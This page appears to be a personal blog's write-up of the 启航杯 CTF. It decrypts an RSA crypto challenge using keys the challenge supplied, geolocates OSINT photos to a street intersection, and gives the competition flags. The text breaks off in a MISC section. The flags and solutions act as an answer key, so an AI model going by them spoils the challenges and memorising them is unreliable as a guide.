<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Lwwww">
    
    <title>
        
            启航杯WP |
        
        Lwwww&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/dog.svg">
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/font/css/regular.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/font/css/solid.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/font/css/brands.min.css">
    
        
            
        
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#b2bec3","title":"Lwwww's Blog","author":"Lwwww","avatar":"/images/dog.svg","logo":"/images/dog.svg","favicon":"/images/dog.svg"},"menu":{"home":"/","archives":"/archives","categories":"/categories","links":"/links","about":"/about"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"铭心渐行","hitokoto":false},"social_contact":{"enable":true,"links":{"weixin":"/images/vx.jpg","qq":"/images/qq.jpg","赞赏":"/images/zs.jpg"}},"scroll":{"progress_bar":true,"percent":true,"hide_header":false},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"updated"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["亮汪汪","亮汪汪汪","亮汪汪汪汪"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":true,"share":true,"reward":{"enable":true,"img_link":"/images/zs.jpg","text":"给亮汪汪买点狗粮吧⋆⋅☆(✪ω✪)☆⋅⋆","icon":null}},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.39"},"waline":{"server_url":null,"reaction":false,"version":"3.3.2"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":true},"cdn":{"enable":true,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2025,"word_count":true,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":true,"css":[null],"js":["/js/usetime.js"]},"root":"","source_data":{"links":[{"title":"大师傅们"},{"name":"_sun_","link":"https://sun1028.top","description":"非常非常优秀的学弟，WEB的宠儿","avatar":"https://s3.ax1x.com/2020/11/17/DVvkB4.jpg"},"......","......","......"],"icons":{"赞赏":{"svg":"<svg t=\"1737602637086\" class=\"icon\" viewBox=\"0 0 1024 1024\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" p-id=\"17503\" width=\"200\" height=\"200\"><path d=\"...\"></path></svg>","link":"img | /images/zs.jpg"}}},"version":"4.2.5"}
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"}
    KEEP.language_code_block = {"copy":"Copy code","copied":"Copied","fold":"Fold code block","folded":"Folded"}
    KEEP.language_copy_copyright = {"copy":"Copy copyright info","copied":"Copied","title":"Original post title","author":"Original post author","link":"Original post link"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/dog.svg">
                </a>
            
            <a class="site-name border-box" href="/">
               Lwwww&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                HOME
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                ARCHIVES
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                CATEGORIES
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/links">
                                
                                LINKS
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/about">
                                
                                ABOUT
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            HOME
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            ARCHIVES
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                            CATEGORIES
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/links">
                            
                            LINKS
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/about">
                            
                            ABOUT
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        启航杯WP
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/dog.svg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Lwwww</span>
                                
                                    <span class="author-badge">Lv2</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-01-25 22:32:41</span>
            </span>

            
                <span class="meta-info-item post-update-date">
                    <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                    <span class="datetime" data-updated="Mon Feb 17 2025 22:03:16 GMT+0800">2025-02-17 22:03:16</span>
                </span>
            
        

        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/WP-CTF/">-WP -CTF</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>3.5k Words</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>14 Mins</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <p>这次启航杯跟Demon师傅组队，Demon师傅很牛做出两个misc但是web的发力期被我截断了不然肯定嘎嘎做，但是必须批评Demon找来的两个队友水的一逼而且态度真是无语，早早组好的局竟然有个人没报名，然后一整天都在当捧哏，一个ez的伪协议绕过就直接把他卡死一早上。下午我让他去写WP payload和思路都给了结果晚上了给我说：”写不出来~“另一个选手也是极品，报名了但是好像没参与，给一号选手用账号去了。最后定榜55名，我以为是没奖但是好像是前70给奖，但是无所谓了，题的质量很一般。可惜misc还是做少了经验太少不然感觉除了第二个osint以外其他的应该是能ak的，</p>
<p>取证也是奇奇怪怪的FTK配了半天挂载到本地结果还是不好使一直权限不够权限不够的，不然感觉还能多做点取证题。</p>
<p>幸亏有Demon师傅帮我分担写wp的重担，而且还给我投喂奶茶和点心真是破费了。</p>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="Easy-RSA"><a href="#Easy-RSA" class="headerlink" title="Easy_RSA"></a>Easy_RSA</h3><p>题目是开启容器给题，基本上就是动态flag</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="D:/lwwblog/source/images/202502/20250217210017773-1739797529725-4.png"
                        alt="20250217132406168.png"
                 ></p>
<p>$$<br>private_key &#x3D; b’—–BEGIN RSA PRIVATE KEY—–\nMIICWwIBAAKBgQDaRITFDVDfEl8XwGzeiYnK+ZL9tB16amRkn+1je4M7lONcmQEV\nL673B9YpCZ1HVtD87G7xiHmc&#x2F;wrgi8bzEVQ06YRLXThg6IoTbT6LUZPYZn8SevBN\npc46oD8VPfMmplc0DXqg&#x2F;HJaQYj4HhSTjontsO2ohGExUndlcpQrcDwQBQIDAQAB\nAoGANF40LMMhICRcRGqatFnzgYuXxN8uI2zbYXktj6zWs7jpRBJBvD+QjxyGOZpg\n7fjac5SWmcTQyOY4Sd+&#x2F;gBosRYRA11O+ssWUvYva1pxAW36QYn6BApuuFOJV4iZN\n7z5lyHdQU9AKW+qfCw5mYBqDu&#x2F;gQ6aIKIqXcc4yzOuVWfZECQQDpO7X+cDDRUKMS\nsrT5BUCgLKeZ+EvcItAMFDPctYWx3M4TWs7rx&#x2F;4mKRLUb4M+kAeMjNRr&#x2F;uHP1WbO\nethUI&#x2F;0HAkEA75LUucqfHxy70m6fM4TDbMd9+l&#x2F;9rHur9LNOVATyOTtP8o6cEmNw\n7jIm1+qCdY4UUV04E6JAJCdHfs2XvZPTkwJAARmD+SgkQshjjHIFQmtQ67BqNeKi\n0O3lFzl9KRw9&#x2F;iGxYwv5j8kInLty2EeSUdgyAOqlEcFI5Ub3Th&#x2F;sJzFoPwJAWcBA\nQXpPMnCpTKR0r&#x2F;BE5jO2Vl4vwrZyLTIfXgqcVCSMRup2Pc1TOWlAdBM+3JtlsTWj\nFHfsX573geGzvynqUQJAGVEl858Q0cjbagyTh5ByLxn+dR+Zsixjw7xBX1isJW2+\n2iiEUVsixyYY3&#x2F;Yk7&#x2F;m+B&#x2F;FF5iTV5G7pNK1oQ35fAA&#x3D;&#x3D;\n—–END RSA PRIVATE KEY—–’<br>public_key &#x3D; b’—–BEGIN PUBLIC KEY—–\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDaRITFDVDfEl8XwGzeiYnK+ZL9\ntB16amRkn+1je4M7lONcmQEVL673B9YpCZ1HVtD87G7xiHmc&#x2F;wrgi8bzEVQ06YRL\nXThg6IoTbT6LUZPYZn8SevBNpc46oD8VPfMmplc0DXqg&#x2F;HJaQYj4HhSTjontsO2o\nhGExUndlcpQrcDwQBQIDAQAB\n—–END PUBLIC KEY—–’<br>enmessage:WjCP8Htx9flF7S28xJz&#x2F;eiwjOJr5QwJ9ZUTLL3PqujMsAWonjLeMLfcHprEY&#x2F;lcyXOR3CShyE0HqQjEFnRrI0+cnwtFkY3OG341g6mEuwqG364vKmq95FPEi76y9ICdfuagTdAuzhzvISXkgATQ2V31nvgeln1+vuAq0hez9qEM&#x3D;<br>private_key &#x3D; b’—–BEGIN RSA PRIVATE KEY—–\nMIICXAIBAAKBgQDSkyfKFrEABN38FH5ZWwclPY+7z3I5qp8ckUcp0MDM9AEw9C4U\n2TpQ6kX7o1DhxaX+lXZsvkY30VTjeFLagQLwyEvEaXkLrCkA6Vt+LRZrGh&#x2F;eoji2\nmwZgZQAP5mcNN+zd8UfJ477WiSnyFAhP9xo4Yk&#x2F;ulBiiXbDzxJ6uENavhwIDAQAB\nAoGAIlmyBHPrf3V2dtrVpPhF8&#x2F;ZqaONAHsBtaz4XDe8JUdsTX1Z94UBxvxBbG9+6\nNSebr&#x2F;+BYt+D2d19NmGC9opUHaz0ngSTSAbLhJRKLfl&#x2F;i2aI1I6A&#x2F;Gj88zi8s6yF\nsQr8jgLZMg1xYDtjXRRcMRB16fPXecikJBfUuhHocWEtyokCQQDY6o31ZF8mM2rl\nz1QrOHs5oIAXGgWsrrPQS9dlFsp3b5xo4l7vwgZfl8bSCujfnM4v&#x2F;KJfJt&#x2F;TJu9E\nWlTv8mupAkEA+IQZKsutRpb+zRKd+&#x2F;jKZV3xXuo+eJGT8rydp5L1xy0Aen+qKZyd\naTl2dUFUo04&#x2F;bmxGKmsD&#x2F;VPPjskpDOy&#x2F;rwJBAI+7jGlIIwxLEdBJe3pQKMbcpUOp\niI0ODjQ9rPJdEbfmivus1D+Gj3aUObhAZmKVosKFYoouVi2yJOVj&#x2F;dgpCFECQF2o\nkz+QsUYIRBEPciDzO3wGcqAd0dtoqgRyV0w&#x2F;U4d0C1kfYgb6skxkzqMUMwy0wa0g\n+zSjTkab3n5mi6UGWJsCQApqGz86U709A3G9gF34G75ePLQVwOI&#x2F;9RjtzxuIY3Rn\nBS5ACOsQb&#x2F;kW1wal2MhCOdWKgDrl0KZpzg855Sh4Rd0&#x3D;\n—–END RSA PRIVATE KEY—–’<br>public_key &#x3D; b’—–BEGIN PUBLIC KEY—–\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDSkyfKFrEABN38FH5ZWwclPY+7\nz3I5qp8ckUcp0MDM9AEw9C4U2TpQ6kX7o1DhxaX+lXZsvkY30VTjeFLagQLwyEvE\naXkLrCkA6Vt+LRZrGh&#x2F;eoji2mwZgZQAP5mcNN+zd8UfJ477WiSnyFAhP9xo4Yk&#x2F;u\nlBiiXbDzxJ6uENavhwIDAQAB\n—–END PUBLIC KEY—–’<br>enmessage:OVafA&#x2F;n9ovZx9rd+mM2lz41u4Ga1xaYJssXApL0hfKwBWTA&#x2F;XAC+OX4hVk3UWPZbs&#x2F;68oN&#x2F;C5LmzwEfyBC0N10cOIuJq78eTvMLaj6tc72PPAbt+0YUBSbIMt6m7&#x2F;kzty&#x2F;l5nbZxVt4TCPyH8Zqr4NzriqQhNwjUhrhTGT7wJBs&#x3D;<br>$$<br>其实我是不太会密码的然后附件给了一个py的模板</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> cryptography.hazmat.primitives <span class="keyword">import</span> serialization</span><br><span class="line"><span class="keyword">from</span> cryptography.hazmat.primitives.asymmetric <span class="keyword">import</span> padding</span><br><span class="line"><span class="keyword">from</span> cryptography.hazmat.primitives <span class="keyword">import</span> hashes</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line"><span class="comment"># 加载私钥</span></span><br><span class="line"></span><br><span class="line">private_key_pem = <span class="string">b&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">-----BEGIN RSA PRIVATE KEY-----</span></span><br><span class="line"><span class="string">MIICXQIBAAKBgQC8NruXkH2ORXb249GMv+8Y3tPd8nu5OOMPUV5L16KELi9AVxoY</span></span><br><span class="line"><span class="string">Y1v7aEnMXNkUEQ1yeLjyxQrPV3QmQA9jaTLdLf/QgyxGPDlVjjb1g9uxxLr5N0a4</span></span><br><span class="line"><span class="string">SLZ9uaQ5EkswTFtvQyHzbC21eowxvVNapHMfEEp5YuThrgQynxuQCcHtswIDAQAB</span></span><br><span class="line"><span class="string">AoGAFUNKV8SV5/lBXSypSJvfBfHCgLFQuJZMfIyw46OQSMYzm11butlFaSEZLpJn</span></span><br><span class="line"><span class="string">XxolaUMUgy9Z2ckOUPXtZx8u2iv2t1UzJeh3cCbhGok4+Ja69JWoRQeslTk2W2Tx</span></span><br><span class="line"><span class="string">TYuUuspQYYrna+cUNsd4MRKMoa+bDosjRy3rqlnvPb5utC0CQQDSvDxlWjvI+pFf</span></span><br><span class="line"><span class="string">4fylByLBSlfDDDR80tXoMWj28t43JH+mviyl8rkX7zppH4BVe9IL+0nv+myWuJ8O</span></span><br><span class="line"><span class="string">IcQ4SZKHAkEA5KQZxRGMd1Ax1HhFqOPzqMFcszzzp2mpOEbZyhmrCRAa5MUmPIko</span></span><br><span class="line"><span class="string">rwYJvYwUWT7a3AZcl/Koi7bqhfFOo43adQJAS76k5rkcLA0EG7aanKaH83nJOa41</span></span><br><span class="line"><span class="string">X3hYsnCwDbMV9DQGPeS1H6Cyrsup7wcHlbI/uVbFKKCWT0ZkxSuV37VyGQJBANB2</span></span><br><span class="line"><span class="string">UkycgG60fopTEmg3VgwyKHv/gcPNEY2PA7lBh/DebzbQDdm50I8ruSvKES+BoHhl</span></span><br><span class="line"><span class="string">kHy1sTiZkOCIsANtLZUCQQCk1BgGGG+sKRHS2/xu3lT3C2Ihn1hrnNLMQ5QlC0JJ</span></span><br><span class="line"><span class="string">/FSHxvVpzB8o94PNq6X+KrK6p82WYfkLKl+A5YPhoh/Q</span></span><br><span class="line"><span class="string">-----END RSA PRIVATE KEY-----</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 加载私钥</span></span><br><span class="line"></span><br><span class="line">private_key = serialization.load_pem_private_key(private_key_pem, password=<span class="literal">None</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 加密的消息</span></span><br><span class="line"></span><br><span class="line">enmessage = <span class="string">b&quot;PfifIriIHAwst7UxsHPNj3CGwlnNWbB5iVVq9O6oEsinLxxJgHcTmBHFGxWA5FC87aHKARXCzwH+v4H1ES/lMSnkVuVfrQdReR62GYIWUYuB2Gb6LnEJ0n4x9sXBA5FrSH9wlu14WT4S+ko+90kCS2jgGC7R2vKRe2QfFFwZ1R8=&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 解密消息</span></span><br><span class="line"></span><br><span class="line">encrypted_message = base64.b64decode(enmessage)</span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    decrypted_message = private_key.decrypt(</span><br><span class="line">        encrypted_message,</span><br><span class="line">        padding.PKCS1v15(),</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 使用适当的哈希算法</span></span><br><span class="line"></span><br><span class="line">​        algorithm=hashes.SHA256()</span><br><span class="line">​    )</span><br><span class="line">​    <span class="built_in">print</span>(decrypted_message.decode())</span><br><span class="line"><span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">​    <span class="built_in">print</span>(<span class="string">f&quot;Decryption failed: <span class="subst">&#123;e&#125;</span>&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>然后去找ai，一开始是直接扔给他是不行的，但是多调教几次就好</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">from Crypto.PublicKey import RSA</span><br><span class="line">from Crypto.Cipher import PKCS1_OAEP</span><br><span class="line">import base64</span><br><span class="line"></span><br><span class="line"># 加载私钥</span><br><span class="line">private_key = b&#x27;&#x27;&#x27;-----BEGIN RSA PRIVATE KEY-----</span><br><span class="line">MIICXAIBAAKBgQDEfgk6+MERVwmKx6b4w4HM+cKlP34Lz7qMICOnDK906zIQyA2a</span><br><span class="line">7YTba8vssM4jpf+RLda0ZtAWnLj+sVgsBQAaWQ8quUt2FJCFEglpCBbvvsdfBD/A</span><br><span class="line">Wc6w58ekPUWvcMu+Q68EVUre1lSXl8Lt2U0ObB77l577nYAdr7rf7HJMlwIDAQAB</span><br><span class="line">AoGAAaKQLm7GIdV46DAOckt417J3AtZVv4C/AKN+fclb5xEonX3MqdldcvtL+xri</span><br><span class="line">3Du+tf/iUCX63UqjOhtSVytuJhuQ2QIUUrkNEPkNBye5aIPN6j4buZXHzyfyVxqy</span><br><span class="line">6zddT0HTGzIOEn9VIIHMydrrdvEYEd2ZrwlRQApTNAQztGECQQDOllqpJ/R/Kgb3</span><br><span class="line">8QuJvhN1jDco9DYb9c2+XZL3u5aFZpJ2C86gus2NrK8096V7LOt02Vc0n4gBuXYv</span><br><span class="line">9BMbo997AkEA832M97qZ+aVi0c0okDv0wORxtDDE/zoXOjzSMS+xMoC7i27Hn/Az</span><br><span class="line">DL6EHfYBxqj247Tq9QxMBMumclyL/+GOlQJALfwR2i1moxe7zVz+cH663iOD873I</span><br><span class="line">fZjNX1585GABNViLqXMfX2+1aZ/SsDufvjdVggEPBEuufpPF1w7BYhmsGQJABGJS</span><br><span class="line">U3OMqi4MJXLoNBCgS4jRc0kdgurs2COYNUKCkkI3Hj+UYJDWmngjsNZpGcaZC2iK</span><br><span class="line">gncCN2PjT1PTQXwyMQJBAJItDvEaRC8BzlC10h31KC6gmmwU8IsqBYe4B6+btvIT</span><br><span class="line">UXZ23kO/okQTy65x4MmP5g1XLJAj29jVeZAUW+/B2uo=</span><br><span class="line">-----END RSA PRIVATE KEY-----&#x27;&#x27;&#x27;</span><br><span class="line"></span><br><span class="line"># 加密后的消息</span><br><span class="line">encrypted_message = b&#x27;&#x27;&#x27;EfXlCYvGHy4Haw0cl9dW5ufxMoB9rgturZOVoKokBg/fHOPDpiYY+jeABxMKAgjr</span><br><span class="line">Cbtync9Gx0l0dfYSs06KTKVfR5L4oZbwolWx19bCVWzlQ9f91x1Z8U/uE9fG0xna</span><br><span class="line">/wUTvrExm8QdKC1OxmSFvPNrffrkEDzEVWP3lTPZ3wQ=&#x27;&#x27;&#x27;</span><br><span class="line"></span><br><span class="line">def decrypt_message(encrypted_message, private_key):</span><br><span class="line">    # 导入私钥</span><br><span class="line">    key = RSA.import_key(private_key)</span><br><span class="line">    # 使用PKCS1_OAEP解密</span><br><span class="line">    cipher = PKCS1_OAEP.new(key)</span><br><span class="line">    # 解码Base64格式的加密消息</span><br><span class="line">    decrypted_message = cipher.decrypt(base64.b64decode(encrypted_message))</span><br><span class="line">    return decrypted_message.decode()</span><br><span class="line"></span><br><span class="line"># 解密消息</span><br><span class="line">decrypted_message = decrypt_message(encrypted_message, private_key)</span><br><span class="line"></span><br><span class="line"># 输出解密后的消息</span><br><span class="line">print(&quot;解密后的消息:&quot;)</span><br><span class="line">print(decrypted_message)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/ezrsa2.png"
                        alt="ezrsa2.png"
                 ></p>
<p><code>QHCTF&#123;c0cd580e-2859-469c-b58e-cec1abe77e6d&#125;</code></p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="请找出拍摄地所在位置-OSINT"><a href="#请找出拍摄地所在位置-OSINT" class="headerlink" title="请找出拍摄地所在位置-OSINT"></a>请找出拍摄地所在位置-OSINT</h3><p>这个题很恶心，我认为</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/%E8%AF%B7%E6%89%BE%E5%87%BA%E6%8B%8D%E6%91%84%E5%9C%B0%E6%89%80%E5%9C%A8%E4%BD%8D%E7%BD%AE.jpg"
                        alt="请找出拍摄地所在位置.jpg"
                 ></p>
<p>说一下我做这个题目的思路，首先就是对着图片本身去找一下主要就是看exif，但是一般这种网络迷踪肯定是不会给的，所以没有收获很正常，然后我就把目光放到那种精准定位的地方了，我想看左侧蓝色大巴后面小车棚的电话，直接去问问（哈哈真这么想的但是可惜很糊辨认不清楚）然后这些周围的商家店铺太杂乱了，地图上是很难找到的，但是我还是找了想碰碰运气。</p>
<p>接下来的解题思路是锁定右上角的广告，柳城鸿鑫4s店，直接锁死柳州市，然后对着商家店铺输出，最后最容易找到的是绿源电动车上面的那个共享科技美学馆，直接就能锁定这个路口</p>
<p>但是flag死活交不对，一开始我以为是我找错了</p>
<p><em>小明在接亲戚回家过年时随手拍了一张照片，之后他在网上发起了一个挑战：找到照片中的地点并排名前三的人，将获得额外奖励。现在，挑战就在你面前，你准备好接受了吗？</em><br><em>提交方式：QHCTF{xx省&#x2F;自治区xx市xx县&#x2F;市&#x2F;区xx路与xx路交叉口}</em></p>
<p>看到这个提交格式你不懵逼吗？</p>
<p>最后过了一个多小时我实在做不出来的时候反应过来要不然试试没有&#x2F;</p>
<p>直接成功，真是无语以后建议给格式就标准一些，别老误导我们CTFer</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/osint1.png"
                        alt="osint1.png"
                 ></p>
<p><code>QHCTF&#123;广西壮族自治区柳州市柳城县六广路与榕泉路交叉口&#125;</code></p>
<h3 id="OSINT-你猜猜这是哪？"><a href="#OSINT-你猜猜这是哪？" class="headerlink" title="OSINT-你猜猜这是哪？"></a>OSINT-你猜猜这是哪？</h3><p>这道题当时没出，后来在群里问出题人解题思路，出题人说第一个osint是静心拍摄的，第二个osint纯纯随手拍</p>
<p>但是我没想到这题最后20多解，估计是被py烂了，群里的大哥说去大众点评找酒店，不能找后面的银行，银行太多了，酒店反而好找</p>
<p>我是没话说了，能找到感觉也是狗运，我是没狗运了</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="http://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/%E4%BD%A0%E7%8C%9C%E7%8C%9C%E8%BF%99%E6%98%AF%E5%93%AA%EF%BC%9F.jpg"
                        alt="你猜猜这是哪？.jpg"
                 ></p>
<h3 id="你能看懂这串未知的文字吗"><a href="#你能看懂这串未知的文字吗" class="headerlink" title="你能看懂这串未知的文字吗"></a>你能看懂这串未知的文字吗</h3><p>这题当时也没出，很早就找到羊文了但是扔到随波逐流梭哈没有成功我就很懵逼</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/%E4%BD%A0%E8%83%BD%E7%9C%8B%E6%87%82%E8%BF%99%E4%B8%B2%E6%9C%AA%E7%9F%A5%E7%9A%84%E6%96%87%E5%AD%97%E5%90%97.png"
